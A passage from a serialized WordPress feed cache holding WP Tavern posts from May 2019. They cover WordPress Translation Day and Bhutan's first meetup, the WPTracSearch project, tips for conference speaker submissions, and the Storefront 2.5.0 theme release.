href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a><a href="https://twitter.com/irwpmeetup?ref_src=twsrc%5Etfw">@irwpmeetup</a> <a href="https://twitter.com/TranslateWP?ref_src=twsrc%5Etfw">@TranslateWP</a> <a href="https://t.co/BkHmma1gbP">pic.twitter.com/BkHmma1gbP</a></p>\n<p>&mdash; Saeed Fard (@saeed_fard) <a href="https://twitter.com/saeed_fard/status/1127181222352965633?ref_src=twsrc%5Etfw">May 11, 2019</a></p></blockquote>\n<p></p>\n<p>Translation Day 4 hosted more local events than previous years with participants in Africa, Asia, Europe, North America, South America and Oceania. Some of these events projected the livestream, online talks, and tweets, enabling attendees to follow along with other participants across the globe.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-13-at-11.00.33-AM.png?ssl=1"><img /></a></p>\n<p>Energetic groups of Polyglots gathered together to make WordPress more accessible in their languages. Their goals included the following:</p>\n<ul>\n<li>Increase the number of PTEs</li>\n<li>Increase the number of mentors</li>\n<li>Translate the top 200 plugins and themes</li>\n<li>Curate Polyglot assets: glossary and rules</li>\n<li>Improve the Translate page on Rosetta</li>\n</ul>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">500+ strings translated to <a href="https://twitter.com/hashtag/Nepali?src=hash&ref_src=twsrc%5Etfw">#Nepali</a> at <a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> <a href="https://t.co/6nd16X5aMB">pic.twitter.com/6nd16X5aMB</a></p>\n<p>&mdash; Utsav Singh Rathour (@rathour) <a href="https://twitter.com/rathour/status/1127127459546128385?ref_src=twsrc%5Etfw">May 11, 2019</a></p></blockquote>\n<p></p>\n<h3>Bhutan Hosts Its First Meetup in Thimphu for WordPress Translation Day</h3>\n<p>Some of the newly initiated Polyglots contributors came from Bhutan where the country&#8217;s <a href="https://www.meetup.com/WordPress-Meetup-Thimphu/" rel="noopener noreferrer" target="_blank">first WordPress meetup was hosted in Thimphu</a> this past weekend. Organizer Ugyen Dorji gathered local developers, designers, and publishers for WordPress Translation Day, adding more contributor to the <a href="https://translate.wordpress.org/locale/dzo/default/wp/dev/" rel="noopener noreferrer" target="_blank">Dzongkha locale</a>, the national language of Bhutan. The group now has 26 members. </p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">It''s my privilege to meet our WordPress core contributors for Dzongkha  <a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> very first WordPress meetup event for Bhutan and would like to thank each and everyone here to make the event with success. <a href="https://t.co/wql9dFpVHO">pic.twitter.com/wql9dFpVHO</a></p>\n<p>&mdash; Ugyen Dorji (@ugyendzodorji) <a href="https://twitter.com/ugyendzodorji/status/1127236687950516225?ref_src=twsrc%5Etfw">May 11, 2019</a></p></blockquote>\n<p></p>\n<p>Dorji invited a speaker for the meetup, Tenzin Namgyel, an ICT officer from the Dzongkha Development Commission who is also the locale manager and GTE for Dzongkha. He explained the basics of translating WordPress and the attendees participated in Translation Day via the livestream. </p>\n<p>Dorji is passionate about completing the Dzongkha translation, encouraging Dzongkha bloggers, and improving local government websites. Many local government websites, such as the <a href="https://www.dzongkha.gov.bt/" rel="noopener noreferrer" target="_blank">Dzongkha Development Commission</a>, rely on WordPress. As the organizer of the fledgling meetup, Dorji is full of ideas for growing the Bhutanese WordPress community.</p>\n<p>&#8220;My next plan is to visit the language university and teach them to blog in Dzongkha using WordPress,&#8221; he said. &#8220;We have plans to gather a group of active Bhutanese WordPress bloggers and host panel talks. WordCamp Thimphu is my goal &#8211; to reach and invite more WordPress experts as speakers of the main event and help Bhutanese to grow their careers with WordPress.&#8221;</p>\n<p>In addition to launching a new WordPress community in Bhutan, participants in the Translation Day event translated thousands of strings and helped new teams make progress towards launching packages for WordPress 5.2. Some of the most popular plugins and themes are now more accessible to the global WordPress user base, thanks to contributions inspired by the virtual event. </p>\n<p>Events like this are a reminder of just far-reaching WordPress&#8217; influence is across cultures. The Polyglots team is made up of a diverse and remarkably collaborative community of volunteers. Check out a few of the translation teams below that checked in from around the world with pictures on Twitter.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">We’re all set and ready to translate everything <a href="https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw">#WordPress</a> <img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f4aa-1f3fc.png" alt="💪🏼" class="wp-smiley" /><a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> <a href="https://t.co/fCl9gOcrQ5">pic.twitter.com/fCl9gOcrQ5</a></p>\n<p>&mdash; Niloofar Firoozmand (@niloomand) <a href="https://twitter.com/niloomand/status/1127129544572510208?ref_src=twsrc%5Etfw">May 11, 2019</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Having a fantastic <a href="https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw">#WordPress</a> translation day with folks at Ahmedabad. One step to making our local WordPress awesome.</p>\n<p><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f4aa.png" alt="💪" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f4aa.png" alt="💪" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f4aa.png" alt="💪" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/2764.png" alt="❤" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/2764.png" alt="❤" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/2764.png" alt="❤" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f64c.png" alt="🙌" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f64c.png" alt="🙌" class="wp-smiley" /><img src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f64c.png" alt="🙌" class="wp-smiley" /><a href="https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw">#WordPress</a> <a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> <a href="https://twitter.com/hashtag/WordPressPolyglots?src=hash&ref_src=twsrc%5Etfw">#WordPressPolyglots</a> <a href="https://twitter.com/hashtag/India?src=hash&ref_src=twsrc%5Etfw">#India</a> <a href="https://twitter.com/TranslateWP?ref_src=twsrc%5Etfw">@TranslateWP</a> <a href="https://twitter.com/WordPress?ref_src=twsrc%5Etfw">@WordPress</a> <a href="https://twitter.com/wpahmedabad?ref_src=twsrc%5Etfw">@wpahmedabad</a> <a href="https://twitter.com/multidots?ref_src=twsrc%5Etfw">@multidots</a> <a href="https://t.co/P6HD7ioN8j">pic.twitter.com/P6HD7ioN8j</a></p>\n<p>&mdash; Mukesh Panchal (@mukeshpanchal27) <a href="https://twitter.com/mukeshpanchal27/status/1127476074865053696?ref_src=twsrc%5Etfw">May 12, 2019</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Translating some strings with some folks at <a href="https://twitter.com/weDevs?ref_src=twsrc%5Etfw">@weDevs</a> and preparing for WordCamp Dhaka.  <a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> <a href="https://t.co/rVOSu5wWAu">pic.twitter.com/rVOSu5wWAu</a></p>\n<p>&mdash; Lincoln Islam (@niazlincoln) <a href="https://twitter.com/niazlincoln/status/1127563116282167296?ref_src=twsrc%5Etfw">May 12, 2019</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Translating <a href="https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw">#WordPress</a> into multiple languages by the <a href="https://twitter.com/wpmumbai?ref_src=twsrc%5Etfw">@wpmumbai</a> community.<a href="https://twitter.com/TechySahil?ref_src=twsrc%5Etfw">@TechySahil</a> <a href="https://twitter.com/Fairy_Dharawat?ref_src=twsrc%5Etfw">@Fairy_Dharawat</a> <a href="https://twitter.com/seher_skhan?ref_src=twsrc%5Etfw">@seher_skhan</a> <a href="https://twitter.com/gounder?ref_src=twsrc%5Etfw">@gounder</a> </p>\n<p>Thank you to <a href="https://twitter.com/EnduranceIn?ref_src=twsrc%5Etfw">@EnduranceIn</a> for sponsoring the venue and refreshments. <a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> <a href="https://t.co/ZtX8vKo7ui">pic.twitter.com/ZtX8vKo7ui</a></p>\n<p>&mdash; Meher Bala (@meherbala) <a href="https://twitter.com/meherbala/status/1127115568882995201?ref_src=twsrc%5Etfw">May 11, 2019</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> in Istanbul was  both fun and fruitful. Along with 70 other locations in the world, we contributed <a href="https://twitter.com/hashtag/translations?src=hash&ref_src=twsrc%5Etfw">#translations</a> to <a href="https://t.co/FMvSCHb8fm">https://t.co/FMvSCHb8fm</a> and <a href="https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw">#WordPress</a> Rosetta projects. <a href="https://t.co/DLfCKHGSZV">pic.twitter.com/DLfCKHGSZV</a></p>\n<p>&mdash; Artbees (@artbees_design) <a href="https://twitter.com/artbees_design/status/1127211307655139329?ref_src=twsrc%5Etfw">May 11, 2019</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Translating <a href="https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw">#WordPress</a> to <a href="https://twitter.com/hashtag/Nepali?src=hash&ref_src=twsrc%5Etfw">#Nepali</a> <a href="https://twitter.com/hashtag/WPTranslationDay?src=hash&ref_src=twsrc%5Etfw">#WPTranslationDay</a> <a href="https://twitter.com/hashtag/WPNepal?src=hash&ref_src=twsrc%5Etfw">#WPNepal</a> <a href="https://twitter.com/hashtag/Kathmandu?src=hash&ref_src=twsrc%5Etfw">#Kathmandu</a> <a href="https://t.co/I2VbFmGLaZ">pic.twitter.com/I2VbFmGLaZ</a></p>\n<p>&mdash; Utsav Singh Rathour (@rathour) <a href="https://twitter.com/rathour/status/1127097874238414848?ref_src=twsrc%5Etfw">May 11, 2019</a></p></blockquote>\n<p></p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 13 May 2019 22:35:30 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:33;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:92:"WPTavern: WPTracSearch: An Elasticsearch-Powered Search Interface for WordPress Trac Tickets";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89489";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:102:"https://wptavern.com/wptracsearch-an-elasticsearch-powered-search-interface-for-wordpress-trac-tickets";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4385:"<p><a href="https://core.trac.wordpress.org/" rel="noopener noreferrer" target="_blank">WordPress Trac</a> is one of the more utilitarian and uninspiring interfaces that many contributors have to contend with in the process of giving back to the project. After growing tired of Trac&#8217;s mediocre search functionality, <a href="https://wearnhardt.com/" rel="noopener noreferrer" target="_blank">William Earnhardt</a> set out to improve it with a new project called <a href="https://tracsearch.wpteamhub.com" rel="noopener noreferrer" target="_blank">WPTracSearch</a> that gave him an opportunity to play around with Elasticsearch and React.</p>\n<p>WPTracSearch provides an alternative Elasticsearch-powered interface for searching WordPress Trac tickets. It performs a full text search of all of the fields, delivering more accurate results, even for basic queries, thanks to Elasticsearch&#8217;s relevance ranking. The results can be easily filtered based on milestone, component, focuses, usernames, and more criteria, making it easier to find specific tickets.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-10-at-3.01.51-PM.png?ssl=1"><img /></a></p>\n<p>The search interface also supports fuzzy matching, adding to its ability to deliver more relevant results. Even if a term is misspelled (either in the search or the ticket) it will still yield results, as in the example below:</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/fuzzy-match.png?ssl=1"><img /></a></p>\n<p>Earnhardt is a WordPress core contributor and a developer at Bluehost. His core team has the discretion to work on whatever they want for WordPress core and the community. </p>\n<p>&#8220;This fit in nicely with that, but was also just something fun to tinker with,&#8221; he said. &#8220;It started as a fun experiment with Elasticsearch last fall. I built an index on my local machine and played around with it but got busy with other stuff pre-5.0 push and it sort of fell by the wayside.</p>\n<p>&#8220;Then early this year I had a few times come up where it would have been helpful, so I threw together an interface for it and got it online.&#8221;</p>\n<p>If you want to use WPTracSearch but are not sure how current the ticket index is, Earnhardt said it&#8217;s nearly constantly in sync:</p>\n<blockquote><p>There is a PHP script that parses all the information about a ticket in Trac using the XMLRPC api and puts it into an Elasticsearch index. There is a bash script that runs on a cron every minute to find any tickets updated since the last run and then uses the PHP script to reindex them. So it stays pretty constantly in sync.</p></blockquote>\n<p>The project uses a React interface that relies on the <a href="https://github.com/appbaseio/reactivesearch/" rel="noopener noreferrer" target="_blank">Reactivesearch</a> library to query the Elasticsearch index. Earnhardt also borrowed some code from Ryan McCue’s <a href="https://github.com/rmccue/not-trac" rel="noopener noreferrer" target="_blank">Not Trac</a> to help with some of the UI that deals with parsing TracLinks and code blocks.</p>\n<p>WPTracSearch is an evolving project and Earnhardt has lots of plans for improving it. The two highest priority items on his roadmap are indexing meta Trac and making a search UI for it. He also wants to make the individual tickets have navigable URLs instead of being modal pop up windows when you click on the summary in the search results.</p>\n<p>&#8220;I do it that way because it’s a lot faster to stay in this interface than jumping back and forth to core.trac.wordpress.org when browsing tickets, but you can’t link directly to a ticket and forward/back doesn’t work,&#8221; Earnhardt said.</p>\n<p>&#8220;You can also query the Elasticsearch index directly without using the React interface if you know Elasticsearch Query DSL. This allows pretty complex queries to be built. I’ve thought about creating some charts using that. It could help with the core triage team effort to better understand churn and progress toward bringing that open ticket count down. There are a lot of cool possibilities.&#8221;</p>\n<p><a href="https://github.com/earnjam/wptracsearch" rel="noopener noreferrer" target="_blank">WPTracSearch</a> is available on GitHub if anyone wants to contribute ideas or code to improve it.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 10 May 2019 21:42:55 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:34;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:71:"WPTavern: Tips for Replying to A Call for Papers or A Call for Speakers";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89521";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:82:"https://wptavern.com/tips-for-replying-to-a-call-for-papers-or-a-call-for-speakers";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:10893:"<div class="wp-block-image"><img /></div>\n\n\n\n<p>The following is a guest post written by <a href="https://jenniferbourn.com/">Jennifer Bourn</a>. With 21 years experience as a graphic designer, 15 years experience as a web designer, 14 years as a creative agency owner, and 11 years as a blogger, Jennifer Bourn has worked with hundreds of service-based businesses to build brands and establish profitable online platforms. She also co-organizes the <a href="https://www.meetup.com/Sacramento-WordPress/">Sacramento WordPress Meetup</a> and <a href="https://2019.sacramento.wordcamp.org/">WordCamp Sacramento</a>. </p>\n\n\n\n<p>After being the lead organizer for <a href="https://2019.sacramento.wordcamp.org/">WordCamp Sacramento</a> for two years, speaker wrangler for two years, managing the program for a year, and speaking at several WordCamps and non-WordPress related conferences myself, I have seen a lot of amazing and a lot of awful speaker submissions. Some speaker submissions have been from people I know personally — people I want to choose and say yes to — but ultimately couldn’t because their submission was subpar.</p>\n\n\n\n<p>It’s incredibly tough to both apply to speak and select speakers from applications.</p>\n\n\n\n<p>With that in mind, I shared a <a href="https://twitter.com/jenniferbourn/status/1126608018953523200">Twitter thread</a> yesterday with tips for replying to a<a href="https://twitter.com/hashtag/CallforPapers?src=hash"> Call for Papers or a Call for Speakers that will help you get your next talk submission accepted and it is summarized for your convenience below:</a></p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<p>If your title is confusing, weird, unclear, too cutesy, or it feels like you put no effort into it, that will work against you. Organizers want talks attendees will be interested in and excited for. It must be easy to understand what the talk is about based on the title alone.</p>\n\n\n\n<p>If your talk description is all about you, is only one sentence long, is sarcastic/unprofessional, isn’t aligned with the event focus/theme, or it’s totally self-serving, you should rethink things. Your talk isn’t about you, it’s about helping attendees expand their knowledge and move the needle and helping organizers host a successful event.</p>\n\n\n\n<p>It is never ever a good idea to disparage or put down a person, job, tool, piece of software, or anyone/anything to make your point or make your topic interesting. If the only way you can communicate your point is through negativity, reconsider the topic. Being controversial may have been a draw in years past, but now it’s a risk most organizers aren’t willing to take.</p>\n\n\n\n<p>Consider that someone else (or several people) may submit a talk on the exact same subject. Your title and description need to convince organizers why your submission should be picked over the other person’s submission.</p>\n\n\n\n<p>Consider that if you submit multiple talks, none of them may be selected if your titles aren’t interesting and your descriptions are not descriptive. It must be clear what the talk is about and what the takeaways are, and how this talk will benefit the attendees.</p>\n\n\n\n<p>Always think about how you can make the organizers’ or event planners’ jobs easier and follow instructions. For example, if they ask for bios in third-person, provide your bio in third-person. If they ask for full name, provide your full name.</p>\n\n\n\n<p>Spell the name of the conference, software, industry, etc. correctly in your speaker application. Want to speak at a WordPress event? Double check that you’ve capitalized the P and proofread your submission.</p>\n\n\n\n<p>Look at the topics requested by the event organizers. Submit talks on those topics and your chances of being selected will be higher because they are telling you what they want. Lists of preferred topics are usually included because that is what their local community has specifically requested.</p>\n\n\n\n<p>Don’t submit the same talk you’ve submitted 10 times to other events. Put in some effort. Look at the event theme and submit something that relates to it or customize the talk title/description to include the theme.</p>\n\n\n\n<p>Look at the past event schedules, agenda, or programs. Look at the types of talks they accept. For example, if a WordCamp has only had 2-3 business related talks in the past four years, it might be a sign they aren’t looking for business talks and want talks focused more on using WordPress.</p>\n\n\n\n<p>Look at the topics the event has already covered in previous years. Then find the gap and find something they haven’t already heard or done. </p>\n\n\n\n<p>Steer clear of the marketing hype. Avoid topics related to killing it, hustling, crushing, and dominating. Don’t refer to yourself as a guru or a thought leader (that’s only cool when other people say it about you). Avoid negativity, sarcasm, and assumptions about the audience.</p>\n\n\n\n<p>If organizers ask how or why you’re qualified to talk on the topic being submitted:</p>\n\n\n\n<ul><li>It’s okay to be new/just learning — fresh voices are awesome.</li><li>Don’t just copy and paste your bio into the field. They already have your bio and that’s not what they meant or what they want.</li></ul>\n\n\n\n<p>Never assume the people reviewing your application are experts on your talk topic or have the same technical background you do.</p>\n\n\n\n<p>Avoid submitting a talk that is all about one piece of software — i.e. one plugin — especially if the software is premium and requires an investment. An entire session dedicated to a paid plugin <strong>1)</strong> excludes those who have not purchased it or cannot purchase it and <strong>2)</strong> will apply to few attendees. Instead, consider a compare/contrast presentation that covers both free and paid options or a talk that introduces attendees to multiple options.</p>\n\n\n\n<p>It&#8217;s okay to submit opinion pieces as talks, but be careful to <strong>NOT</strong> position your opinion or approach as the only one or the right one, when there are other options. Often there isn&#8217;t one right way (unless it&#8217;s technical and there is one right way).</p>\n\n\n\n<p>If the submission form asks what skill level audience your talk is the best fit — Beginner, Intermediate, or Advanced — don&#8217;t pick them all. That isn&#8217;t helpful. The same is true if they ask who your talk is aimed at — designers, developers, or users, etc. </p>\n\n\n\n<p>Organizers for events like WordCamps need to satisfy a diverse audience. The attendee makeup often ranges from those who make a living with WordPress all the way to newbies who just learned what WordPress is a few days ago, so talks at and for every skill level are needed and valued. Don’t skip applying because you think your talk isn’t advanced enough.</p>\n\n\n\n<p>If there is a &#8216;notes to the organizer&#8217; field in the talk submission form, communicate that you&#8217;re open to suggestions or making tweaks to the talk focus to ensure it&#8217;s a great fit for their audience. Often a talk being reviewed is close to what they want, but it needs a small tweak to be selected.</p>\n\n\n\n<p>If something funky happened when you hit submit, don&#8217;t be afraid to submit your talk again. Organizers would rather have duplicate submissions than miss your submission. Also, it&#8217;s okay to reach out to confirm your submission was received. </p>\n\n\n\n<p>Don&#8217;t skip applying to speak because you don&#8217;t think you know enough yet or don’t have enough experience yet. Everyone has value to contribute and fresh perspectives are always appreciated. Plus, there are people who just discovered or figured out the thing you want to talk about exists — I guarantee you can help them.</p>\n\n\n\n<p>Behind the scenes organizers work hard to create a diverse lineup of speakers that provides representation for everyone in the community. Organizers can ask, beg, plead, and do loads of outreach, but ultimately, they are limited by who is willing to apply and/or who is willing to accept an invite to speak. So please say yes and apply.</p>\n\n\n\n<p>When organizers make the offer to help you brainstorm talk ideas, craft a talk title/description, and even create your slide deck or watch your practice, say yes. Take them up on the offer. Asking for help doesn&#8217;t make you any less awesome. There are a lot of people who are incredibly talented and smart with great value to share but find it difficult to put what they know into a talk format. If that’s you, you’re not alone and there are people who want to help.</p>\n\n\n\n<h3>Interested in trying your hand at speaking for the first time? </h3>\n\n\n\n<p>Every event has limited space. When securing rooms for multi-track events and planning the schedule, organizers need to be able to split attendees across the different rooms/tracks. This means they need competing talks in each track that will be a draw and attract attendees. No one wants one full room and one empty room. No one.</p>\n\n\n\n<p>If you don&#8217;t get selected, don&#8217;t get down on yourself. Often the selection choice has nothing to do with you and is simply a matter of many submissions on the same topic(s), needing to balance topics across disciplines to serve the range of attendees or skill sets, and looking for more diverse representation in the speaker lineup.</p>\n\n\n\n<p>If the event is local to you, always apply. Many times event/conference organizers want to fill the speaking spots (or at least half of them) with local people from their community or region and you&#8217;ll have a leg up on the out-of-towners. Similarly, if there is a meetup group in the area tied to the event/conference, go to the meetup and get to know the organizers and other attendees. </p>\n\n\n\n<p>New to a subject/topic? Just learning it? No problem! Consider submitting a talk reviewing your experience as a new user. Share surprises and obstacles encountered, lessons learned, and suggestions for improvement. This can be hugely valuable for advanced users who tend to what new users deal with and it can provide a different perspective and voice.</p>\n\n\n\n<p>Want to learn a topic better? There&#8217;s no better way than to teach others about it. Submit the talk, do the work to learn it, and teach everything you’ve learned so far. For example, if you want to build a membership site, submit a talk on how to choose a membership plugin, document your research in finding the right plugin, and share what plugins you reviewed, what criteria you used for evaluation, what you discovered (pros/cons), and which you ended up choosing.</p>\n\n\n\n<p>Never underestimate the power of awareness. Consider pitching a talk that presents options to expand attendees awareness of what is available or possible and gives them a starting place to research things on their own.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 10 May 2019 18:32:16 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:35;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:68:"WPTavern: Storefront 2.5.0 Introduces a Custom, Block-Based Homepage";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89483";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:78:"https://wptavern.com/storefront-2-5-0-introduces-a-custom-block-based-homepage";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1855:"<p><a href="https://wordpress.org/themes/storefront/" rel="noopener noreferrer" target="_blank">Storefront</a>, WooCommerce&#8217;s free flagship theme, has just released version <a href="https://woocommerce.wordpress.com/2019/05/09/storefront-2-5-0-is-now-available-to-download/" rel="noopener noreferrer" target="_blank">2.5.0</a> with updates that make it easier to setup and customize the homepage. </p>\n<p>In 2017, WooCommerce 2.2 introduced starter content to help users set up the homepage template, menus, widgets, and add some demo products. This content has been updated to incorporate the WooCommerce blocks that were rolled into the plugin&#8217;s 3.6 release. It also adds support for the new cover block, which enables users to place headings, paragraphs, and buttons inside the block. </p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2019/05/storefront-customize-homepage.png?ssl=1"><img /></a></p>\n<p>These changes essentially create a custom, editable homepage with all the flexibility of blocks, giving users more control than the previous custom homepage template approach. The old homepage (template-homepage.php) has now been retired.</p>\n<p>Storefront is active on more than 200,000 stores. Many of these sites already have their homepages set, but the new block-based homepage makes it easier to set up a new store or make changes to existing homepage designs without having to use custom code or a plugin. </p>\n<p>Version 2.5 is a minor release but still requires testing before updating, as some users have already <a href="https://github.com/woocommerce/storefront/issues/1127" rel="noopener noreferrer" target="_blank">reported</a> a few discrepancies with how the &#8220;full width&#8221; template is displayed. Previewing the update in a staging environment will ensure there are no surprises on update. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 10 May 2019 15:59:20 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:36;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:59:"WordPress.org blog: Tomorrow is WordPress Translation Day 